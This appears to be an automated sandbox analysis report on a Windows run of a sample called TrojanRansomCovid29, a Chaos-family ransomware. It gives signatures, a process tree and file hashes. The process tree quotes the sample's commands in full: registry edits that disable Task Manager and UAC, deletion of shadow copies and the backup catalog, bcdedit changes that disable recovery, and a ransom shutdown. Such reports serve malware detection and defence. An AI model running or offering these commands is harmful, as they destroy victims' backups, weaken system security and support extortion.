Analysis

  • max time kernel
    127s
  • max time network
    131s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    23-11-2024 15:30

General

  • Target

    https://www.pinterest.com/ouchtak/gaming-setup/

Malware Config

Signatures

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • Chaos family
  • UAC bypass 3 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 31 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 4 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 7 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 63 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 53 IoCs
  • Suspicious use of FindShellTrayWindow 34 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.pinterest.com/ouchtak/gaming-setup/
    1⤵
    • Enumerates system info in registry
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1520
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffa300946f8,0x7ffa30094708,0x7ffa30094718
      2⤵
        PID:2332
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
        2⤵
          PID:4980
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4744
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
          2⤵
            PID:4120
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:1
            2⤵
              PID:776
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
              2⤵
                PID:3816
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5492 /prefetch:1
                2⤵
                  PID:2020
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5688 /prefetch:1
                  2⤵
                    PID:3000
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
                    2⤵
                      PID:392
                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
                      2⤵
                        PID:568
                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                        2⤵
                        • Drops file in Program Files directory
                        PID:3020
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x224,0x254,0x7ff777fc5460,0x7ff777fc5470,0x7ff777fc5480
                          3⤵
                            PID:3760
                        • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:8
                          2⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3284
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
                          2⤵
                            PID:4972
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
                            2⤵
                              PID:2872
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
                              2⤵
                                PID:3852
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5068 /prefetch:1
                                2⤵
                                  PID:5040
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6420 /prefetch:1
                                  2⤵
                                    PID:3696
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6120 /prefetch:1
                                    2⤵
                                      PID:3920
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
                                      2⤵
                                        PID:2428
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
                                        2⤵
                                          PID:5584
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1
                                          2⤵
                                            PID:5692
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=2728 /prefetch:8
                                            2⤵
                                              PID:5896
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
                                              2⤵
                                                PID:5904
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:8
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5916
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,6466824676732321815,7542426733322480165,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1752 /prefetch:2
                                                2⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5808
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:3164
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:4548
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:2908
                                                  • C:\Users\Admin\AppData\Local\Temp\23079c6d-feba-4667-bce2-0892357e0ea7_Covid29 Ransomware.zip.ea7\TrojanRansomCovid29.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\23079c6d-feba-4667-bce2-0892357e0ea7_Covid29 Ransomware.zip.ea7\TrojanRansomCovid29.exe"
                                                    1⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5332
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\C04D.tmp\TrojanRansomCovid29.bat" "
                                                      2⤵
                                                      • Checks computer location settings
                                                      • System Location Discovery: System Language Discovery
                                                      • Modifies registry class
                                                      PID:5384
                                                      • C:\Windows\SysWOW64\WScript.exe
                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\C04D.tmp\fakeerror.vbs"
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:5616
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping localhost -n 2
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:5644
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:2088
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:1260
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:2952
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:2524
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
                                                        3⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:5848
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
                                                        3⤵
                                                        • UAC bypass
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:1092
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                                                        3⤵
                                                        • UAC bypass
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies registry key
                                                        PID:5924
                                                      • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\mbr.exe
                                                        mbr.exe
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Writes to the Master Boot Record (MBR)
                                                        • System Location Discovery: System Language Discovery
                                                        PID:4048
                                                      • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\Cov29Cry.exe
                                                        Cov29Cry.exe
                                                        3⤵
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:6012
                                                        • C:\Users\Admin\AppData\Roaming\svchost.exe
                                                          "C:\Users\Admin\AppData\Roaming\svchost.exe"
                                                          4⤵
                                                          • Checks computer location settings
                                                          • Drops startup file
                                                          • Executes dropped EXE
                                                          • Drops desktop.ini file(s)
                                                          • Sets desktop wallpaper using registry
                                                          • Modifies registry class
                                                          • Suspicious behavior: AddClipboardFormatListener
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:3152
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                            5⤵
                                                              PID:5228
                                                              • C:\Windows\system32\vssadmin.exe
                                                                vssadmin delete shadows /all /quiet
                                                                6⤵
                                                                • Interacts with shadow copies
                                                                PID:5840
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                wmic shadowcopy delete
                                                                6⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3672
                                                            • C:\Windows\System32\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                                                              5⤵
                                                                PID:5528
                                                                • C:\Windows\system32\bcdedit.exe
                                                                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                                                                  6⤵
                                                                  • Modifies boot configuration data using bcdedit
                                                                  PID:5572
                                                                • C:\Windows\system32\bcdedit.exe
                                                                  bcdedit /set {default} recoveryenabled no
                                                                  6⤵
                                                                  • Modifies boot configuration data using bcdedit
                                                                  PID:3752
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                                                                5⤵
                                                                  PID:5668
                                                                  • C:\Windows\system32\wbadmin.exe
                                                                    wbadmin delete catalog -quiet
                                                                    6⤵
                                                                    • Deletes backup catalog
                                                                    PID:2088
                                                                • C:\Windows\system32\NOTEPAD.EXE
                                                                  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\covid29-is-here.txt
                                                                  5⤵
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:252
                                                            • C:\Windows\SysWOW64\shutdown.exe
                                                              shutdown /r /t 300 /c "5 minutes to pay until you lose your data and system forever"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:4596
                                                            • C:\Windows\SysWOW64\PING.EXE
                                                              ping localhost -n 9
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                              • Runs ping.exe
                                                              PID:6056
                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                              taskkill /f /im explorer.exe
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Kills process with taskkill
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:5848
                                                            • C:\Users\Admin\AppData\Local\Temp\C04D.tmp\Cov29LockScreen.exe
                                                              Cov29LockScreen.exe
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:3312
                                                        • C:\Windows\system32\vssvc.exe
                                                          C:\Windows\system32\vssvc.exe
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5836
                                                        • C:\Windows\system32\wbengine.exe
                                                          "C:\Windows\system32\wbengine.exe"
                                                          1⤵
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:5888
                                                        • C:\Windows\System32\vdsldr.exe
                                                          C:\Windows\System32\vdsldr.exe -Embedding
                                                          1⤵
                                                            PID:4048
                                                          • C:\Windows\System32\vds.exe
                                                            C:\Windows\System32\vds.exe
                                                            1⤵
                                                            • Checks SCSI registry key(s)
                                                            PID:2748

                                                          Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Downloads

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            152B

                                                            MD5

                                                            6dda6e078b56bc17505e368f3e845302

                                                            SHA1

                                                            45fbd981fbbd4f961bf72f0ac76308fc18306cba

                                                            SHA256

                                                            591bf3493eb620a3851c0cd65bff79758a09c61e9a22ea113fa0480404a38b15

                                                            SHA512

                                                            9e460013fd043cee9bdbcdaf96ac2f7e21a08e88ddb754dddbd8378ee2288d50271e66b42092d84a12e726469465185be11a6fafab6ed4236a244524bd60f502

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                            Filesize

                                                            152B

                                                            MD5

                                                            f6126b3cef466f7479c4f176528a9348

                                                            SHA1

                                                            87855913d0bfe2c4559dd3acb243d05c6d7e4908

                                                            SHA256

                                                            588138bf57e937e1dec203a5073c3edb1e921c066779e893342e79e3d160e0b4

                                                            SHA512

                                                            ef622b26c8cee1f767def355b2d7bffb2b28e7a653c09b7e2d33f6468a453fff39fd120cacbffd79ce35722592af0f3fb7d5054e2dca06310e44dc460533f3d8

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\6cea5cc4-9f1c-4ade-9765-5e5987e29d27.tmp

                                                            Filesize

                                                            70KB

                                                            MD5

                                                            e5e3377341056643b0494b6842c0b544

                                                            SHA1

                                                            d53fd8e256ec9d5cef8ef5387872e544a2df9108

                                                            SHA256

                                                            e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

                                                            SHA512

                                                            83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

                                                            Filesize

                                                            67KB

                                                            MD5

                                                            b275fa8d2d2d768231289d114f48e35f

                                                            SHA1

                                                            bb96003ff86bd9dedbd2976b1916d87ac6402073

                                                            SHA256

                                                            1b36ed5c122ad5b79b8cc8455e434ce481e2c0faab6a82726910e60807f178a1

                                                            SHA512

                                                            d28918346e3fda06cd1e1c5c43d81805b66188a83e8ffcab7c8b19fe695c9ca5e05c7b9808599966df3c4cd81e73728189a131789c94df93c5b2500ce8ec8811

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

                                                            Filesize

                                                            366KB

                                                            MD5

                                                            e6940bda64389c1fa2ae8e1727abe131

                                                            SHA1

                                                            1568647e5acd7835321d847024df3ffdf629e547

                                                            SHA256

                                                            eef5dd06cf622fb43ea42872bc616d956de98a3335861af84d35dbaf2ab32699

                                                            SHA512

                                                            91c07e84e5188336464ae9939bfc974d26b0c55d19542527bdcd3e9cac56d8c07655dc921acaa487ed993977a22a0f128dc3c6111273273ff1f637b20bb56fb6

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

                                                            Filesize

                                                            63KB

                                                            MD5

                                                            226541550a51911c375216f718493f65

                                                            SHA1

                                                            f6e608468401f9384cabdef45ca19e2afacc84bd

                                                            SHA256

                                                            caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5

                                                            SHA512

                                                            2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

                                                            Filesize

                                                            19KB

                                                            MD5

                                                            1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

                                                            SHA1

                                                            6dd8803e59949c985d6a9df2f26c833041a5178c

                                                            SHA256

                                                            af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

                                                            SHA512

                                                            b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                            Filesize

                                                            48B

                                                            MD5

                                                            acb230c6df83c412676f5ddcd338e5f3

                                                            SHA1

                                                            4f7505b62af1fb79861be66976dd21ca0246346d

                                                            SHA256

                                                            11338c344e2123034995f6dd5c1fb2f9f39d42b4e91754cf7af4876b1b9d9271

